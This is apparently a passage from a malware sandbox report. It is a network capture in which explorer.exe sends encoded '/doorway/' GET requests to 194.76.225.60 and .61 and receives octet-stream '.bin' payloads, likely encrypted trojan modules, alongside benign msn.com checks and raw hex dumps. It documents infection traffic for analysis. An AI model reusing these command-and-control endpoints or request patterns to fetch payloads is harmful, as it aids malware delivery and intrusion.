7b e5 9d 2e fa cf e5 86 ad 8f 34 42 ea 1f f6 8f 87 88 25 b0 fb 5e 42 65 a6 82 8e c1 a1 7c 2e fa cf 17 fb 88 77 32 ec e0 75 c5 0b 65 89 7e 8a d0 90 a4 19 db 19 80 d2 da c9 94 9d 11 cf 6c f6 ac 34 14 70 80 1d c1 e5 6e 38 a6 10 cb 18 cf 1a 7b 55 a6 0d 0b cf 05 40 55 cf 4b dd 45 12 dd 52 63 66 02 f2 08 80 62 e0 47 33 a0 5c 15 24 ee cb a4 d7 8d 34 d7 b2 ca 46 31 f9 d2 13 ca 33 8d ff 2d c2 b6 a9 f8 35 db 75 29 4a b5 06 3d 3e 8d de 11 39 f7 7d 71 0f 0a 3d d8 76 46 8a a3 9a 12 1d 80 0a dd 7d f3 0b d4 d3 ec 0e 76 4a de 0c c6 1e d6 89 e4 f7 eb 62 85 14 d0 f8 4c 07 a4 d1 Data Ascii: OI>$%_2hPdQG7dDxE-^_+L;=D<B=`MpawtU=VRFNfKjI8)]h_G%dGm[B?bH":ag{k%/tg6iQV"9-dVzNmp-o,J6;O=,{'xsb5I+;\NmgSI~oLId^]NUph/OD_I=Tvg)!?FYEeA89?34;[b]QCbKCI9oDr.ltg@Lzt(Y+lK;7P,(\|u1%\|SUg<ey:hL;aXp9}IeJgFKe-h7PAbNJlk&:&ZO55-d%Z(UQoMPr~;__R2pLyE\[/ +aXXQmu7_^=6C\Vi?K],7FN.BLyi~4\UVc~rCfO}Rl=)f{.4B%^Be\|.w2ue~l4pn8{U@UKERcfbG3\$4F13-5u)J=>9}q=vF}vJbL
Oct 11, 2022 15:01:58.649008036 CEST	860	OUT	GET /doorway/yww9t6EI6u3knXcyyJCm/k0PaEmMkYIgXI64U0Xz/raOOkTYJ1OffkP1wEWgVkk/KDIFR_2BFO6sY/C2PaBaPa/Sss01ix_2BadgeHfS9wHDYB/Y8ru3rQs3i/_2BVL_2F9XZIKlCI8/B1oNU6QkNaWX/PsYuvkPEO_2/F4YFTJXJbymKQ2/fHoiICtdHiiOAaF3y2_2B/YuR2etKSof76kp2a/rN6zIbIDcAsv1vB/ZbVJT7_2F5CmNDvPiV/bnGga5QOC/6JDIjD6kBTEGU_2FDRCY/QI5i_2BmMOmGPPVMPTI/LhHL9V2_2/Bt.drr HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 194.76.225.60 Connection: Keep-Alive Cache-Control: no-cache
Oct 11, 2022 15:01:58.903132915 CEST	861	OUT	GET /doorway/yww9t6EI6u3knXcyyJCm/k0PaEmMkYIgXI64U0Xz/raOOkTYJ1OffkP1wEWgVkk/KDIFR_2BFO6sY/C2PaBaPa/Sss01ix_2BadgeHfS9wHDYB/Y8ru3rQs3i/_2BVL_2F9XZIKlCI8/B1oNU6QkNaWX/PsYuvkPEO_2/F4YFTJXJbymKQ2/fHoiICtdHiiOAaF3y2_2B/YuR2etKSof76kp2a/rN6zIbIDcAsv1vB/ZbVJT7_2F5CmNDvPiV/bnGga5QOC/6JDIjD6kBTEGU_2FDRCY/QI5i_2BmMOmGPPVMPTI/LhHL9V2_2/Bt.drr HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 194.76.225.60 Connection: Keep-Alive Cache-Control: no-cache
Oct 11, 2022 15:01:59.095309973 CEST	862	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 11 Oct 2022 13:01:59 GMT Content-Type: application/octet-stream Content-Length: 1810 Connection: keep-alive Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: inline; filename="634569470f551.bin" Data Raw: 64 b4 4d 32 b3 47 46 e5 a6 09 81 3e 92 0f 7d 6b a4 48 23 24 c6 fe 74 d3 20 c0 05 3d 9f d5 7e 7c 1b 1c 8f 43 e7 40 c4 d3 bd a7 4b cd e4 af 31 b6 45 37 bd 9f 22 6f 64 cb 56 0c 2f 84 93 3b 59 fc 9a db 03 82 38 91 07 12 ab 1b e0 c0 7e f1 10 01 a9 24 af 18 a4 9f a9 8d 8e 09 d0 8a 9f 76 6f a4 4d 3e 2e 8b 0f d5 f0 4b e8 10 ba fe 7b 57 60 12 f4 2f 4d 61 70 03 29 f4 a1 4f 4b cb 02 87 da 96 0b 32 5c 75 d1 fa 5c 0d 44 b9 9e 2e 31 6d 4f bd 5a 2f e5 61 22 83 50 a1 a9 93 7e 4a 25 58 ee 6b cd e2 7f d9 10 b3 7e 9e bb 2f 9a b8 07 81 48 fa 9f 97 ef 36 e1 26 c3 88 34 bb 49 3a e5 98 ba c8 9a f3 c8 73 6e 05 d3 85 1e 86 d0 ba 21 51 99 16 d0 14 d1 1e 18 e4 d4 89 8d d4 56 b1 ad 38 0a 03 dd 6b 6f 54 6a 9d 64 8f 9d d5 eb 37 26 c0 f5 82 a2 6e f6 8a b2 5f b4 d9 ac dc 86 58 4e be 6e 72 f1 a6 49 b9 48 42 9e b8 45 7d 1d 8a 4d 63 f6 c0 e5 79 0b 23 03 be d5 3a ba d7 40 97 75 66 8f d5 98 35 21 8e 6e 12 ff 8c 98 92 28 e9 ec 9c 42 0c 30 a9 9a 5e 9f b6 b5 d7 4d 24 73 69 76 dd 65 0b aa 1c 5b 9f 83 08 4d 93 27 f9 2b 51 27 b5 b6 76 c9 16 56 92 49 fe 6c 46 6c a0 14 31 69 aa fb 3e d5 bc d9 ca d6 69 d5 13 58 57 c5 21 59 86 48 64 fe 5f 96 72 4e 28 d8 f9 61 e4 e7 ea fb cc f0 be 00 06 50 ca db 50 0e b9 36 47 29 82 b5 dd f8 39 1a 77 61 7d 96 84 b9 5c 5c 36 5e a9 4f 4d 2f 2d b6 7e ad f8 a3 7d 37 5c 1e 1e ca 24 d1 e5 8c d3 a6 11 84 34 aa 20 b5 ba 13 35 1e 0e 94 61 bc 1e 8d b9 91 99 c2 b6 d2 c8 dc 94 7b 8d 1c ec 00 7b fe 38 79 eb d5 aa de b1 5a 46 89 b8 61 87 20 63 ac 75 a2 33 b4 b8 74 8a 93 60 7d 3e 33 25 ca 73 87 4d 61 c7 c6 39 15 88 09 ea cc a5 53 de 3d 39 5f 3c c1 71 d9 b7 0f 53 32 29 56 4c c4 ea 9a cf a4 3e 4b 0d de ad 7e 3e 68 43 d5 ac c0 92 39 2c b8 41 37 fc 66 3d ab ac fa 4a 3d 1c 60 ef 4d 8f 0f d1 5c 8e 67 cc 48 c2 ba da e2 ba b4 cc 71 e2 c0 70 f0 4d 4a 5b 39 89 01 55 ac 6d 93 15 c8 b2 45 53 15 14 e7 2c 19 23 78 36 ea 7e 9a 82 7c 62 eb 64 09 39 f9 6c ef 3a 49 b5 85 fb 37 82 c9 3b 44 43 43 15 1d 68 20 08 07 02 41 b5 d2 5b cc ba e6 13 2f 91 c6 d2 06 67 b0 db c3 68 d9 bf ce d9 58 3b 45 9f d8 c0 04 f2 f6 33 cd 1b c1 80 25 f1 ae f2 ad ba c4 81 41 8c 0e d3 40 c0 f4 1a 6d fa 1a 83 bd 7a f3 57 56 4d b4 bf 9f 07 75 b1 ec 64 95 af 0b fb 26 25 ed d2 4c d9 03 d6 d8 18 81 f3 73 ba e8 bb 9d 24 4b 32 bf 1f bb 7e 30 28 33 ae e6 61 eb 7c f8 f4 4f 50 82 a7 fa 03 63 54 03 cd e2 15 ad 68 d7 b9 17 66 ae 2b 61 28 9d bc 5a 10 9b 04 ec 34 32 88 f2 b0 f4 3e ec 4e d1 9a b3 db 48 38 3a 57 81 01 c8 89 94 45 ec ac 82 0a 1c e2 42 22 e8 2c 89 3e c1 0d 31 ed 32 aa 43 6a 84 93 85 06 3a cb 4a c3 d1 29 b6 19 32 53 94 52 e4 a9 4d 7e 6f c2 2c 2c 3f 28 66 d5 ef 12 f3 10 3f 95 6e 30 2e 7a b7 fc 5f 53 5b 79 22 e5 cc fa 02 bf 07 42 19 92 e5 5d 2e 91 18 49 1b e9 6f 83 89 bb 38 40 c0 d5 57 5f 98 82 a9 32 fe d7 ab e6 c8 94 3b d9 9b a0 b7 28 e2 85 f9 41 83 8c 50 91 a2 df 3b e4 25 3d 15 56 4b 8c 79 50 c1 88 17 d9 f9 64 9d 98 70 b9 c1 70 0a 0f f3 09 ff 1f 9a 37 5c 6d a5 Data Ascii: dM2GF>}kH#$t =~\|C@K1E7"odV/;Y8~$voM>.K{W`/Map)OK2\u\D.1mOZ/a"P~J%Xk~/H6&4I:sn!QV8koTjd7&n_XNnrIHBE}Mcy#:@uf5!n(B0^M$sive[M'+Q'vVIlFl1i>iXW!YHd_rN(aPP6G)9wa}\\6^OM/-~}7\$4 5a{{8yZFa cu3t`}>3%sMa9S=9_<qS2)VL>K~>hC9,A7f=J=`M\gHqpMJ[9UmES,#x6~\|bd9l:I7;DCCh A[/ghX;E3%A@mzWVMud&%Ls$K2~0(3a\|OPcThf+a(Z42>NH8:WEB",>12Cj:J)2SRM~o,,?(f?n0.z_S[y"B].Io8@W_2;(AP;%=VKyPdpp7\m

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49702	204.79.197.203	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 11, 2022 15:04:05.941225052 CEST	867	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Connection: Keep-Alive Cache-Control: no-cache Host: www.msn.com
Oct 11, 2022 15:04:06.009396076 CEST	868	IN	HTTP/1.1 302 Found Cache-Control: no-store, no-transform, no-cache Pragma: no-cache Content-Length: 142 Content-Type: text/html; charset=utf-8 Expires: -1 Location: http://www.msn.com/de-ch/ Vary: User-Agent Set-Cookie: PreferencesMsn=eyJIb21lUGFnZSI6eyJTdHJpcGVzIjpbXSwiTWVTdHJpcGVNb2R1bGVzIjpbXSwiTWFya2V0Q29uZmlndXJhdGlvbiI6eyJNYXJrZXQiOiJkZS1jaCIsIlN1cHByZXNzUHJvbXB0IjpmYWxzZSwiUHJlZmVycmVkTGFuZ3VhZ2VDb2RlIjoiZGUtZGUiLCJDb3VudHJ5Q29kZSI6IkNIIn19LCJFeHBpcnlUaW1lIjo2MzgzMjYyNjI0NTk3NzIzMjYsIlZlcnNpb24iOjF90; domain=msn.com; expires=Wed, 11-Oct-2023 13:04:05 GMT; path=/; HttpOnly Set-Cookie: marketPref=de-ch; domain=msn.com; expires=Wed, 11-Oct-2023 13:04:05 GMT; path=/; HttpOnly Access-Control-Allow-Methods: HEAD,GET,OPTIONS Access-Control-Allow-Origin: * X-AspNetMvc-Version: 5.2 X-AppVersion: 20220715_29743481 X-Activity-Id: 572b646e-3ee8-4645-b961-89a90ade942d X-Az: {did:2be360ae5c6345da911d978376c0449f, rid: 19, sn: neurope-prod-hp, dt: 2022-09-26T09:32:32.2409758Z, bt: 2022-07-15T00:17:15.0459229Z} nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]} X-UA-Compatible: IE=Ed Data Raw: Data Ascii:
Oct 11, 2022 15:04:06.134025097 CEST	869	OUT	GET /de-ch/ HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Connection: Keep-Alive Cache-Control: no-cache Host: www.msn.com Cookie: PreferencesMsn=eyJIb21lUGFnZSI6eyJTdHJpcGVzIjpbXSwiTWVTdHJpcGVNb2R1bGVzIjpbXSwiTWFya2V0Q29uZmlndXJhdGlvbiI6eyJNYXJrZXQiOiJkZS1jaCIsIlN1cHByZXNzUHJvbXB0IjpmYWxzZSwiUHJlZmVycmVkTGFuZ3VhZ2VDb2RlIjoiZGUtZGUiLCJDb3VudHJ5Q29kZSI6IkNIIn19LCJFeHBpcnlUaW1lIjo2MzgzMjYyNjI0NTk3NzIzMjYsIlZlcnNpb24iOjF90; marketPref=de-ch
Oct 11, 2022 15:04:06.417062998 CEST	871	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-transform, no-cache Pragma: no-cache Content-Length: 300675 Content-Type: text/html; charset=utf-8 Expires: -1 Vary: User-Agent Set-Cookie: PreferencesMsn=eyJFeHBpcnlUaW1lIjo2MzgzMjYyNjI0NjE0OTA5OTMsIlZlcnNpb24iOjF90; domain=msn.com; expires=Wed, 11-Oct-2023 13:04:06 GMT; path=/; HttpOnly Access-Control-Allow-Methods: HEAD,GET,OPTIONS Access-Control-Allow-Origin: * X-AspNetMvc-Version: 5.2 X-AppVersion: 20220715_29743481 X-Activity-Id: acc2abc4-12b3-4823-b6aa-fc6407e9fd57 X-Az: {did:2be360ae5c6345da911d978376c0449f, rid: 19, sn: neurope-prod-hp, dt: 2022-09-26T09:32:32.2409758Z, bt: 2022-07-15T00:17:15.0459229Z} nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]} X-UA-Compatible: IE=Edge;chrome=1 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Powered-By: ASP.NET X-XSS-Protection: 1 x-fabric-cluster: pmeprodneu X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: ACC2ABC412B34823B6AAFC6407E9FD57 Ref B: FRA31EDGE0222 Ref C: 2022-10-11T13:04:06Z Date: Tue, 11 Oct 2022 13:04:05 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f Data Ascii: <!DOCTYPE html><html prefix="og: http:/
Oct 11, 2022 15:04:22.319344997 CEST	1225	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Connection: Keep-Alive Cache-Control: no-cache Host: www.msn.com Cookie: PreferencesMsn=eyJFeHBpcnlUaW1lIjo2MzgzMjYyNjI0NjE0OTA5OTMsIlZlcnNpb24iOjF90; marketPref=de-ch
Oct 11, 2022 15:04:22.371227026 CEST	1250	IN	HTTP/1.1 302 Found Cache-Control: no-store, no-transform, no-cache Pragma: no-cache Content-Length: 142 Content-Type: text/html; charset=utf-8 Expires: -1 Location: http://www.msn.com/de-ch/ Vary: User-Agent Set-Cookie: PreferencesMsn=eyJIb21lUGFnZSI6eyJTdHJpcGVzIjpbXSwiTWVTdHJpcGVNb2R1bGVzIjpbXSwiTWFya2V0Q29uZmlndXJhdGlvbiI6eyJNYXJrZXQiOiJkZS1jaCIsIlN1cHByZXNzUHJvbXB0IjpmYWxzZSwiUHJlZmVycmVkTGFuZ3VhZ2VDb2RlIjoiZGUtZGUiLCJDb3VudHJ5Q29kZSI6IkNIIn19LCJFeHBpcnlUaW1lIjo2MzgzMjYyNjI2MjMzNjk0MDQsIlZlcnNpb24iOjF90; domain=msn.com; expires=Wed, 11-Oct-2023 13:04:22 GMT; path=/; HttpOnly Set-Cookie: marketPref=de-ch; domain=msn.com; expires=Wed, 11-Oct-2023 13:04:22 GMT; path=/; HttpOnly Access-Control-Allow-Methods: HEAD,GET,OPTIONS Access-Control-Allow-Origin: * X-AspNetMvc-Version: 5.2 X-AppVersion: 20220715_29743481 X-Activity-Id: 24faa64c-a2a9-417e-9e2a-7782890b507f X-Az: {did:2be360ae5c6345da911d978376c0449f, rid: 19, sn: neurope-prod-hp, dt: 2022-09-26T09:32:32.2409758Z, bt: 2022-07-15T00:17:15.0459229Z} nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]} X-UA-Compatible: IE=Ed Data Raw: Data Ascii:
Oct 11, 2022 15:04:22.372000933 CEST	1251	OUT	GET /de-ch/ HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Connection: Keep-Alive Cache-Control: no-cache Host: www.msn.com Cookie: PreferencesMsn=eyJIb21lUGFnZSI6eyJTdHJpcGVzIjpbXSwiTWVTdHJpcGVNb2R1bGVzIjpbXSwiTWFya2V0Q29uZmlndXJhdGlvbiI6eyJNYXJrZXQiOiJkZS1jaCIsIlN1cHByZXNzUHJvbXB0IjpmYWxzZSwiUHJlZmVycmVkTGFuZ3VhZ2VDb2RlIjoiZGUtZGUiLCJDb3VudHJ5Q29kZSI6IkNIIn19LCJFeHBpcnlUaW1lIjo2MzgzMjYyNjI2MjMzNjk0MDQsIlZlcnNpb24iOjF90; marketPref=de-ch
Oct 11, 2022 15:04:22.571872950 CEST	1253	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-transform, no-cache Pragma: no-cache Content-Length: 300865 Content-Type: text/html; charset=utf-8 Expires: -1 Vary: User-Agent Set-Cookie: PreferencesMsn=eyJFeHBpcnlUaW1lIjo2MzgzMjYyNjI2MjQ2MTk0MzksIlZlcnNpb24iOjF90; domain=msn.com; expires=Wed, 11-Oct-2023 13:04:22 GMT; path=/; HttpOnly Access-Control-Allow-Methods: HEAD,GET,OPTIONS Access-Control-Allow-Origin: * X-AspNetMvc-Version: 5.2 X-AppVersion: 20220715_29743481 X-Activity-Id: 59012c9b-3150-44ff-b43b-01ecb8faae96 X-Az: {did:2be360ae5c6345da911d978376c0449f, rid: 19, sn: neurope-prod-hp, dt: 2022-09-26T09:32:32.2409758Z, bt: 2022-07-15T00:17:15.0459229Z} nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]} X-UA-Compatible: IE=Edge;chrome=1 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Powered-By: ASP.NET X-XSS-Protection: 1 x-fabric-cluster: pmeprodneu X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: 59012C9B315044FFB43B01ECB8FAAE96 Ref B: FRA31EDGE0222 Ref C: 2022-10-11T13:04:22Z Date: Tue, 11 Oct 2022 13:04:21 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f Data Ascii: <!DOCTYPE html><html prefix="og: http:/

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49703	194.76.225.61	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 11, 2022 15:04:22.660669088 CEST	1572	OUT	GET /doorway/uRv392Rtz866/nti_2ByAL1r/R8CkJ_2BndSyRx/sIG44fcYL4SmExCi0ACI7/oER1nF0Bt2Tpxtf8/pvf2xzyDmqE4uH6/atElJIeiaCGvRyaYTW/O_2Bb7sZx/7GOqqpJyOKdZvhgFoplL/gFpgB_2BgQj834VvyfM/T9x1pruFqGyVhzjoXgN9Yh/z5CHc_2FavqJW/MXQOJsyO/VzU5_2FcjvOlXkGZhClQ7RM/oSy78PufE2/FJvd3_2FTRM8OrG4Y/ryVNLZn8s_2B/KVoRzz7Jpgf/a.gif HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Host: 194.76.225.61 Connection: Keep-Alive Cache-Control: no-cache
Oct 11, 2022 15:04:22.861350060 CEST	1572	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 11 Oct 2022 13:04:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 62 30 0d 0a ea eb 34 fa 2b a2 fc 1b 01 4d 6f e8 ab 03 d9 71 2c f5 b6 fd b0 34 8f 38 87 65 58 b7 be 74 2f c5 8f cb 81 8c 87 37 24 b2 f7 ca 8a d4 8e 6a 70 a0 99 f3 20 c2 3c da 24 d9 51 da c9 18 44 a7 3b 98 49 0e 48 aa 37 6e 6b 12 e8 bd e1 60 88 cb 83 b0 20 9e 7e f6 f6 29 6b 6e e7 ab e3 f7 9b 7d f7 f8 67 46 b8 1c 02 e3 75 66 25 fc fc 15 f5 7d 13 42 4e 1e 3a cf 01 e0 ac 74 fc 8b bd b0 c9 36 88 e9 82 d3 05 55 e9 43 c4 62 f0 57 a2 cd 01 6f d7 54 50 ca 22 b5 81 cd 98 70 62 a6 a1 15 13 30 7a 39 5f c5 31 45 f2 54 6f a1 38 6c 90 64 d9 37 79 d3 0d 0a 30 0d 0a 0d 0a Data Ascii: b04+Moq,48eXt/7$jp <$QD;IH7nk` ~)kn}gFuf%}BN:t6UCbWoTP"pb0z9_1ETo8ld7y0
Oct 11, 2022 15:04:22.868494987 CEST	1573	OUT	GET /doorway/bRzGSLjweAbH/PVfy51BTQqO/lWZDAcFYwrYEOw/P1069Ds4xjESTY05mmd1_/2ByVzroc4cimG4A8/PzkyhLRGCX0aFw5/Jtve4MdzfQJPkPgA2k/NTDeHmvoJ/_2B7yHjl7zuPv_2Brki5/vNALnLBqmQChxlgwPJX/YMRMYrIxai4T4_2BKHDViB/Hv_2BBzVFkjNS/FgarEETc/294Vv6pgzz58Ssm8O4z7jEg/g3Dq3u6_2B/toSBBRie0B5BZcweG/l7bNSU7DgvscLKrC/Sp3p.drr HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Host: 194.76.225.61 Connection: Keep-Alive Cache-Control: no-cache
Oct 11, 2022 15:04:23.082669020 CEST	1574	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 11 Oct 2022 13:04:23 GMT Content-Type: application/octet-stream Content-Length: 181405 Connection: keep-alive Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: inline; filename="634569d70f027.bin" Data Raw: 77 cb f2 ef ac ff 08 91 16 18 ee e3 e3 67 7b dc 6d 1e 1b 98 69 1d 6e a9 f9 35 71 f4 6b 19 ec be c4 6b ac 18 fa c6 45 1e 9f db 70 45 a0 04 a6 6d 1a b1 51 e1 f5 99 09 f6 91 13 ef f9 b1 70 5a 88 82 35 2b 90 e5 ec 1b 56 c3 d0 a2 fc db 07 e4 84 53 cb 07 f4 9a 7b 88 d3 c8 60 32 2f 76 84 20 05 f1 ee 0d 6e cb 9a ba ce a5 8a ee 1e 74 45 cc 38 37 68 c1 8d 9f 0f 7b 10 84 53 46 73 a7 bf d6 7c d7 ee 52 26 45 38 06 3a 86 1f 6b 16 65 6a 7b a5 64 dc cd 68 04 ac 25 38 3e ce 93 e7 15 b7 f1 58 c0 bb 07 10 f9 c8 74 8c c0 72 39 75 d8 69 ee 81 7a ab b8 32 cd e8 8a 0c 80 62 61 ca 0c 21 93 69 80 27 31 1b 62 cd 44 77 fa 24 cb a5 7b 1b 2e 6a 9d df 99 43 53 2f 7e 29 a7 ed 3f 09 4f b8 43 5e 92 99 e5 78 25 d4 a9 12 bc 32 a3 60 1d 42 0e cc 66 a7 83 81 d6 79 fd a7 79 27 c8 a4 b3 9a 2a 18 8a de 2c 20 91 18 94 6c c3 e1 09 51 12 ee 2a 88 c0 b4 7b 9f 26 6d 7b d4 a2 d4 ef 7d 50 69 48 b2 8c 87 85 ec 3d 56 92 e9 56 14 e4 42 3a 50 76 4e 12 83 9b dd c8 07 72 42 9f 2a c8 08 03 a3 70 ba e2 ca be b9 5b 99 4b 66 f3 fc de 34 e3 69 c2 9e 2c c7 ca 25 31 73 13 a8 40 56 16 04 09 b8 ba d4 f0 e5 25 71 e7 08 e0 73 2b a8 c2 c2 f3 4c a3 23 48 fe 79 f0 f8 8e ad 81 bc 96 c2 1e bd 56 84 69 bd 19 5e f4 04 d8 6e d7 f5 c9 b1 f0 af 1c 0c 9f cf fe c6 09 7a 59 4b c3 e5 ac 1d ae 7a 90 6d 58 05 d4 92 b3 7f 5e 88 62 0f 84 e4 20 c4 46 47 f0 a2 86 0d a3 cd d8 00 eb 7f ee 60 ab 84 db 99 91 0d 0f 4c da f3 82 bf d6 d7 5d ef 4e 17 f1 75 c0 c0 4e 96 5d 34 59 cf 7e fd 18 58 3f e1 ca 8c d5 b3 a5 cb 7a 39 10 34 c0 50 c4 e6 08 23 53 67 cc 56 8b 5c 87 2e e8 77 5a 6f c5 f9 07 fe 6f 7a 05 09 59 e6 f9 0f 7c 16 73 10 d2 1a d9 ab 5f f7 ed 6b f9 20 e7 3d 7e 84 c9 64 71 b4 33 8f 81 1f 2a 43 99 32 eb 62 78 bb 0b 29 a4 e8 ce 23 bc d0 ea bc ee 69 43 ee 90 9c 39 83 69 0a e0 70 de 2c 17 80 4d fa 19 ef c3 6f 7a d5 95 2a 76 7a 36 c6 ab 54 d3 95 3b 40 a5 34 04 11 54 a6 ab 69 6b fe 06 88 37 4f 4a db cd fe 7f ea 17 a4 38 1c 3b a0 3f 7e f2 d0 b8 f6 36 d2 b2 d9 36 8f 4e b9 a0 de d1 79 2b 6c 7f 6f 2c 24 d4 e3 0c c6 3f 5f d1 77 b9 d4 9c 31 9c 02 40 da e6 bd f0 d2 0f 99 60 78 db 6e 43 43 23 e6 ab ce d9 e3 5d d1 7c 0f 31 3d 8b 85 33 20 0c d5 88 66 61 54 1b 0a b1 4d 32 3e d3 ba 57 c0 fe 93 60 61 21 53 ff d2 5e 61 a0 ac 01 d4 17 82 8b 7c 79 b3 76 0c d1 37 25 75 af 24 39 4a f4 de aa ed e1 31 0a 57 dd 33 0d 46 25 7e b9 a9 a5 eb 71 0a d8 68 2c 9e 1f 48 70 b1 81 7f 4e 0c 6d cf 06 30 6f 2a 9f b3 78 db 01 8d ac a7 b4 2e de 9e 88 52 a8 ed 9d 04 1a 56 a3 d9 51 a0 92 af ce 3f c6 fe ec 38 c2 94 69 cf 68 3d 4d af 28 81 c6 17 34 3b bb 9f c3 22 50 ed fd 4e e0 11 39 8e a4 da f0 eb f7 de 19 fc 62 f0 22 db e5 f1 4f bc 78 f1 7a d4 99 3c 78 88 9e 3d 40 ab c4 25 bd f5 50 2b 97 ca a7 24 87 91 5e d1 88 62 6e 2f 6b ec 70 dc 5d f9 91 12 45 ee 1d 79 e8 6a 6a c6 5d 78 72 e8 1b 19 54 63 d8 2f f3 2e 26 ef 25 ea 29 46 91 8b c2 24 ef 06 c4 ab 9c 26 1a 75 d4 da 3d 0d b3 75 5e f4 ce 33 bb f1 60 23 75 ac 29 fd Data Ascii: wg{min5qkkEpEmQpZ5+VS{`2/v ntE87h{SFs\|R&E8:kej{dh%8>Xtr9uiz2ba!i'1bDw${.jCS/~)?OC^x%2`Bfyy', lQ{&m{}PiH=VVB:PvNrBp[Kf4i,%1s@V%qs+L#HyVi^nzYKzmX^b FG`L]NuN]4Y~X?z94P#SgV\.wZoozY\|s_k =~dq3C2bx)#iC9ip,Mozvz6T;@4Tik7OJ8;?~66Ny+lo,$?_w1@`xnCC#]\|1=3 faTM2>W`a!S^a\|yv7%u$9J1W3F%~qh,HpNm0ox.RVQ?8ih=M(4;"PN9b"Oxz<x=@%P+$^bn/kp]Eyjj]xrTc/.&%)F$&u=u^3`#u)
Oct 11, 2022 15:04:23.184079885 CEST	1768	OUT	GET /doorway/b6wMkPt4iWosnbXK8RWvn/wQ2bkOJqcdbdcNhg/tg0Z3ks_2FXcWvb/njy6I8DMVjfhayfvGk/AHmjUevns/VlDNJo0_2B7BLsOhWepg/SFW_2F2h4VyZK2j7bvO/pwSb1f2R_2B4_2FNz_2Fk5/AtvhdDlWA69Wm/XRrBsoYg/JvQOOWqnl_2BSVvJf6ZjHAL/wi1PXKezi1/T9UASDBDRIpvMBY_2/FoQu0ao4VHCM/ZdN_2Bl0_2B/R_2BeX3PT9oLhg/3PUDsQH9gNCwUAZWN3W4_/2BLY_2F_2F1_2F3U/UklFvieJ/d91ke0Bg/KsQU9iQ.drr HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Host: 194.76.225.61 Connection: Keep-Alive Cache-Control: no-cache
Oct 11, 2022 15:04:23.350198984 CEST	1769	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 11 Oct 2022 13:04:23 GMT Content-Type: application/octet-stream Content-Length: 233105 Connection: keep-alive Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: inline; filename="634569d7506ff.bin" Data Raw: b0 de 4f 49 3e 24 d7 25 8f 5f 32 cb 68 d0 f4 93 af f0 7f 50 64 1d fb 9c 51 47 b4 37 b4 c3 b3 f2 09 f9 64 44 05 e5 ed 84 78 d9 45 a6 f9 2d 18 c3 5e 5f df 2b 4c ec 3b ba 3d 44 d0 f2 1a d5 df f7 0d 15 3c b7 8e c0 c2 ff d0 0b da e3 7f 42 b0 bf 11 3d 60 17 af d1 a5 4d ad 0b 70 61 cc 77 74 11 55 8f 1c 17 3d d4 b3 56 52 46 4e 66 ae 4b 1d ea 18 a4 f3 0d fc 81 df 1c 6a 05 49 87 38 b8 e9 c6 29 5d 1e b3 68 5f f8 47 25 64 f8 47 da 6d cc 5b cb f9 42 9c 04 17 3f a7 ec 18 cd 62 cf 82 99 f3 48 a5 bb 22 98 d4 c5 1c 82 3a 97 e8 c4 11 d7 61 fd 67 7b 08 6b c8 25 98 15 11 9b c6 cb 2f 74 c8 f0 67 8c 07 36 69 01 b2 51 56 e2 22 39 2d 64 a1 